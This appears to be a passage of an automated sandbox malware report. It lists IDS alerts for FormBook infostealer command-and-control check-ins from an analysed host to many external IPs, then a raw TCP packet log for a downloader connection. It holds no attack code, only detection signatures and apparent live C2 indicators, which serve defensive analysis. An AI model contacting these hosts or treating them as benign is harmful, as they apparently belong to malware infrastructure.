2024-08-27T17:48:54.126206+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49839	80	192.168.11.20	172.96.191.39
2024-08-27T17:48:54.126206+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49839	80	192.168.11.20	172.96.191.39
2024-08-27T17:50:38.716431+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49864	80	192.168.11.20	38.47.207.120
2024-08-27T17:49:30.629004+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49847	80	192.168.11.20	3.33.130.190
2024-08-27T17:49:30.629004+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49847	80	192.168.11.20	3.33.130.190
2024-08-27T17:49:01.170461+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49840	80	192.168.11.20	148.135.49.178
2024-08-27T17:51:37.140534+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49879	80	192.168.11.20	85.159.66.93
2024-08-27T17:51:37.140534+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49879	80	192.168.11.20	85.159.66.93
2024-08-27T17:47:21.852343+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49817	80	192.168.11.20	38.47.207.120
2024-08-27T17:50:03.472155+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49854	80	192.168.11.20	154.23.184.218
2024-08-27T17:46:59.134782+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49811	80	192.168.11.20	76.223.67.189
2024-08-27T17:46:59.134782+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49811	80	192.168.11.20	76.223.67.189
2024-08-27T17:51:31.627647+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49877	80	192.168.11.20	85.159.66.93
2024-08-27T17:47:27.522168+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49819	80	192.168.11.20	38.47.207.120
2024-08-27T17:47:27.522168+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49819	80	192.168.11.20	38.47.207.120
2024-08-27T17:50:19.428943+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49859	80	192.168.11.20	76.223.67.189
2024-08-27T17:50:19.428943+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49859	80	192.168.11.20	76.223.67.189
2024-08-27T17:50:41.589299+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49865	80	192.168.11.20	38.47.207.120
2024-08-27T17:48:09.906772+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49828	80	192.168.11.20	85.159.66.93
2024-08-27T17:46:53.854859+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49809	80	192.168.11.20	76.223.67.189
2024-08-27T17:50:14.139128+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49857	80	192.168.11.20	76.223.67.189
2024-08-27T17:46:30.762152+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49807	80	192.168.11.20	154.23.184.218
2024-08-27T17:46:30.762152+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49807	80	192.168.11.20	154.23.184.218
2024-08-27T17:48:12.659988+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49829	80	192.168.11.20	85.159.66.93
2024-08-27T17:50:00.598770+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49853	80	192.168.11.20	154.23.184.218
2024-08-27T17:51:20.709819+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49874	80	192.168.11.20	35.244.245.121
2024-08-27T17:49:06.103987+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49842	80	192.168.11.20	148.135.49.178
2024-08-27T17:48:36.983232+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49834	80	192.168.11.20	3.82.56.39
2024-08-27T17:50:16.776730+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49858	80	192.168.11.20	76.223.67.189
2024-08-27T17:45:52.320809+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49806	80	192.168.11.20	23.111.141.202
2024-08-27T17:50:27.509089+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49861	80	192.168.11.20	203.161.42.73
2024-08-27T17:47:47.146655+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49822	80	192.168.11.20	194.58.112.174
2024-08-27T17:47:07.386107+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49813	80	192.168.11.20	203.161.42.73
2024-08-27T17:47:04.678519+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49812	80	192.168.11.20	203.161.42.73
2024-08-27T17:50:06.272021+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49855	80	192.168.11.20	154.23.184.218
2024-08-27T17:50:06.272021+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49855	80	192.168.11.20	154.23.184.218
2024-08-27T17:49:57.726489+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49852	80	192.168.11.20	154.23.184.218
2024-08-27T17:50:44.450788+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49866	80	192.168.11.20	38.47.207.120
2024-08-27T17:51:09.232935+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49871	80	192.168.11.20	194.58.112.174
2024-08-27T17:51:09.232935+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49871	80	192.168.11.20	194.58.112.174
2024-08-27T17:47:58.613319+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49825	80	192.168.11.20	35.244.245.121
2024-08-27T17:51:28.877508+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49876	80	192.168.11.20	85.159.66.93
2024-08-27T17:48:34.331911+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49833	80	192.168.11.20	3.82.56.39
2024-08-27T17:46:56.492735+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49810	80	192.168.11.20	76.223.67.189
2024-08-27T17:51:23.417319+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49875	80	192.168.11.20	35.244.245.121
2024-08-27T17:51:23.417319+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49875	80	192.168.11.20	35.244.245.121
2024-08-27T17:47:44.402088+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49821	80	192.168.11.20	194.58.112.174
2024-08-27T17:50:32.911692+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49863	80	192.168.11.20	203.161.42.73
2024-08-27T17:50:32.911692+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49863	80	192.168.11.20	203.161.42.73
2024-08-27T17:49:41.237366+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49850	80	192.168.11.20	199.59.243.226
2024-08-27T17:47:10.100521+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49814	80	192.168.11.20	203.161.42.73
2024-08-27T17:47:55.970424+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49824	80	192.168.11.20	35.244.245.121
2024-08-27T17:48:15.429633+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49830	80	192.168.11.20	85.159.66.93
2024-08-27T17:49:09.211330+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49843	80	192.168.11.20	148.135.49.178
2024-08-27T17:49:09.211330+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49843	80	192.168.11.20	148.135.49.178
2024-08-27T17:48:18.187877+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49831	80	192.168.11.20	85.159.66.93
2024-08-27T17:48:18.187877+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49831	80	192.168.11.20	85.159.66.93
2024-08-27T17:48:45.539362+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49836	80	192.168.11.20	172.96.191.39
2024-08-27T17:51:34.376523+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49878	80	192.168.11.20	85.159.66.93
2024-08-27T17:50:30.207492+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49862	80	192.168.11.20	203.161.42.73
2024-08-27T17:51:03.700384+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49869	80	192.168.11.20	194.58.112.174
2024-08-27T17:49:27.990492+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49846	80	192.168.11.20	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 17:45:52.045907021 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.182406902 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.182605028 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.183060884 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.319437981 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320461988 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320571899 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320702076 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320717096 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320806980 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320808887 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.320859909 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.320911884 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.320930958 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320943117 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.320976973 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.321042061 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.321053028 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.321064949 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.321094990 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.321212053 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.321212053 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.457650900 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.457746029 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.457830906 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.457928896 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.457986116 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458049059 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458064079 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458200932 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458206892 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458326101 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458340883 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458350897 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458405972 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458528042 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458623886 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458623886 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458662033 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458707094 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458754063 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458776951 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458832979 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458883047 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.458904028 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458957911 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.458987951 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459028006 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.459052086 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459161997 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459220886 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459340096 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.459352970 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.459404945 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.459459066 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.459506989 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459559917 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.459671021 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.594764948 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.594856977 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.594958067 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595021963 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595052004 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595191002 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595259905 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595380068 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595393896 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595397949 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595527887 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595647097 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595769882 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595788002 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.595889091 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.595957041 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596035004 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596062899 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596076012 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596175909 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596271992 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596282959 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596347094 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596390963 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596425056 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596442938 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596594095 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596642971 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596694946 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596770048 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596821070 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596828938 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.596929073 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.596971035 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597018957 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597023010 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597074032 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597085953 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597088099 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597166061 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597189903 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597296000 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597297907 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597310066 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597321033 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.597347975 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597426891 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.597426891 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.598611116 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.598722935 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.598752975 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.598855019 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.598881960 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.598985910 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.598999977 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599013090 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599107027 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599206924 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599212885 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599256039 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599349976 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599374056 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599477053 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599570990 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599590063 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599643946 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599662066 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599740028 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599764109 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599831104 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599869967 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.599947929 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.599965096 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.600001097 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.600104094 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.731651068 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.731667042 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.731901884 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.731996059 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732115984 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732213020 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732276917 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732284069 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732400894 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732419968 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732569933 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732601881 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732706070 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732707024 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732814074 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732825994 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732876062 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732913971 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.732965946 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.732966900 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733043909 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733078003 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733176947 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733212948 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733264923 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733342886 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733443975 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733455896 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733537912 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733589888 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733668089 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733691931 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733797073 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733876944 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733911037 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.733953953 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.733967066 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734045029 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734081030 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734092951 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734175920 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734188080 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734252930 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734330893 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734353065 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734458923 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734536886 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734539032 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734616995 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734663963 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734694958 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734796047 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734798908 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.734911919 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.734981060 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735071898 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735083103 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735188961 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735286951 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735292912 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735383987 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735416889 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735461950 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735644102 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735661983 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735714912 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.735812902 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735891104 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.735913992 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736046076 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736073017 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736099005 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736110926 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736176968 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736295938 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736371994 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736419916 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736449957 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736474991 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736485958 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736567020 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736668110 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736696959 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736718893 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736814022 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736824989 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736862898 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.736931086 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.736957073 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737056971 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737138987 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737170935 CEST	80	49806	23.111.141.202	192.168.11.20
